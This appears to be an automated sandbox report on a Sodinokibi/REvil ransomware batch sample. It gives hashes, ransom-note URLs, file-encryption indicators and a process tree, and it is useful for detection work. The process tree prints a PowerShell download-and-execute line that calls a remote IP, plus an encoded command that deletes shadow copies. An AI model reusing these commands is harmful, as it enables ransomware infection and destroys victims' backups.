Analysis
-
max time kernel
36s -
max time network
37s -
platform
windows7_x64 -
resource
win7v200722 -
submitted
15-08-2020 18:10
Static task
static1
Behavioral task
behavioral1
Sample
7cd0bfdb268bef7da1671e95b6f5aa33.bat
Resource
win7v200722
Behavioral task
behavioral2
Sample
7cd0bfdb268bef7da1671e95b6f5aa33.bat
Resource
win10
General
-
Target
7cd0bfdb268bef7da1671e95b6f5aa33.bat
-
Size
216B
-
MD5
a5ff6055fd55ba2b81de2d9b7100ec8a
-
SHA1
b8df51a999fc532ba49b2f5769ed7b850ca94f75
-
SHA256
60f07d4e5bfcf8fc08bf003d47aa6915f9c2dd834aa0b75985106206216a460c
-
SHA512
9596d6d408462e5eea678ffa474b6fca135fe71ad024ce6e080ef350ec370c7820585e805e58f44e11cd1fb362badc39878794e505343892c6eb4cbbccbca20d
Malware Config
Extracted
http://185.103.242.78/pastes/7cd0bfdb268bef7da1671e95b6f5aa33
Extracted
C:\lzv1c-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/525AF2391A87112C
http://decryptor.cc/525AF2391A87112C
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 3 528 powershell.exe -
Modifies extensions of user files 9 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
powershell.exedescription ioc process File renamed C:\Users\Admin\Pictures\StartComplete.tif => \??\c:\users\admin\pictures\StartComplete.tif.lzv1c powershell.exe File opened for modification \??\c:\users\admin\pictures\TestReset.tiff powershell.exe File renamed C:\Users\Admin\Pictures\PopJoin.tif => \??\c:\users\admin\pictures\PopJoin.tif.lzv1c powershell.exe File renamed C:\Users\Admin\Pictures\RepairConvert.raw => \??\c:\users\admin\pictures\RepairConvert.raw.lzv1c powershell.exe File renamed C:\Users\Admin\Pictures\TestReset.tiff => \??\c:\users\admin\pictures\TestReset.tiff.lzv1c powershell.exe File renamed C:\Users\Admin\Pictures\UnblockRedo.tif => \??\c:\users\admin\pictures\UnblockRedo.tif.lzv1c powershell.exe File renamed C:\Users\Admin\Pictures\MoveMeasure.png => \??\c:\users\admin\pictures\MoveMeasure.png.lzv1c powershell.exe File renamed C:\Users\Admin\Pictures\ResumeUninstall.png => \??\c:\users\admin\pictures\ResumeUninstall.png.lzv1c powershell.exe File renamed C:\Users\Admin\Pictures\SearchShow.png => \??\c:\users\admin\pictures\SearchShow.png.lzv1c powershell.exe -
Enumerates connected drives 3 TTPs
-
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\o79gyj.bmp" powershell.exe -
Drops file in Program Files directory 37 IoCs
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\program files\RepairExport.pptx powershell.exe File opened for modification \??\c:\program files\SubmitInstall.au3 powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\lzv1c-readme.txt powershell.exe File opened for modification \??\c:\program files\CompareRedo.wmf powershell.exe File opened for modification \??\c:\program files\ConvertFromSearch.vb powershell.exe File created \??\c:\program files\microsoft sql server compact edition\lzv1c-readme.txt powershell.exe File opened for modification \??\c:\program files\ReceiveOpen.mpg powershell.exe File opened for modification \??\c:\program files\BackupClose.tiff powershell.exe File opened for modification \??\c:\program files\CloseUnprotect.docx powershell.exe File opened for modification \??\c:\program files\RestoreNew.mhtml powershell.exe File opened for modification \??\c:\program files\SavePop.ogg powershell.exe File opened for modification \??\c:\program files\UnprotectLock.vst powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\lzv1c-readme.txt powershell.exe File created \??\c:\program files\lzv1c-readme.txt powershell.exe File opened for modification \??\c:\program files\ImportRemove.m3u powershell.exe File opened for modification \??\c:\program files\PopBackup.m4a powershell.exe File opened for modification \??\c:\program files\ResizeReset.wma powershell.exe File opened for modification \??\c:\program files\ResumeTest.AAC powershell.exe File opened for modification \??\c:\program files\SendRequest.png powershell.exe File opened for modification \??\c:\program files\ConvertFromPush.TTS powershell.exe File opened for modification \??\c:\program files\EditHide.TS powershell.exe File opened for modification \??\c:\program files\LockSearch.ADT powershell.exe File opened for modification \??\c:\program files\RepairEdit.temp powershell.exe File opened for modification \??\c:\program files\SaveInvoke.dib powershell.exe File opened for modification \??\c:\program files\UndoCompress.pub powershell.exe File created \??\c:\program files (x86)\lzv1c-readme.txt powershell.exe File opened for modification \??\c:\program files\CompleteSplit.tif powershell.exe File opened for modification \??\c:\program files\PopStop.vb powershell.exe File opened for modification \??\c:\program files\FormatInitialize.mht powershell.exe File opened for modification \??\c:\program files\HideExpand.css powershell.exe File opened for modification \??\c:\program files\EditResume.au powershell.exe File opened for modification \??\c:\program files\EnableDismount.css powershell.exe File opened for modification \??\c:\program files\RenameSkip.wmv powershell.exe File opened for modification \??\c:\program files\StopFormat.scf powershell.exe File opened for modification \??\c:\program files\UninstallApprove.vssm powershell.exe File opened for modification \??\c:\program files\ConvertFromExit.pps powershell.exe File opened for modification \??\c:\program files\DisableDebug.rtf powershell.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 528 powershell.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exepid process 528 powershell.exe 528 powershell.exe 528 powershell.exe 1272 powershell.exe 1272 powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 528 powershell.exe Token: SeDebugPrivilege 528 powershell.exe Token: SeDebugPrivilege 1272 powershell.exe Token: SeBackupPrivilege 628 vssvc.exe Token: SeRestorePrivilege 628 vssvc.exe Token: SeAuditPrivilege 628 vssvc.exe Token: SeTakeOwnershipPrivilege 528 powershell.exe -
Suspicious use of WriteProcessMemory 8 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 1436 wrote to memory of 528 1436 cmd.exe powershell.exe PID 1436 wrote to memory of 528 1436 cmd.exe powershell.exe PID 1436 wrote to memory of 528 1436 cmd.exe powershell.exe PID 1436 wrote to memory of 528 1436 cmd.exe powershell.exe PID 528 wrote to memory of 1272 528 powershell.exe powershell.exe PID 528 wrote to memory of 1272 528 powershell.exe powershell.exe PID 528 wrote to memory of 1272 528 powershell.exe powershell.exe PID 528 wrote to memory of 1272 528 powershell.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\7cd0bfdb268bef7da1671e95b6f5aa33.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1436 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/7cd0bfdb268bef7da1671e95b6f5aa33');Invoke-CROBJXDEH;Start-Sleep -s 10000"2⤵
- Blacklisted process makes network request
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:528 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1272
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:628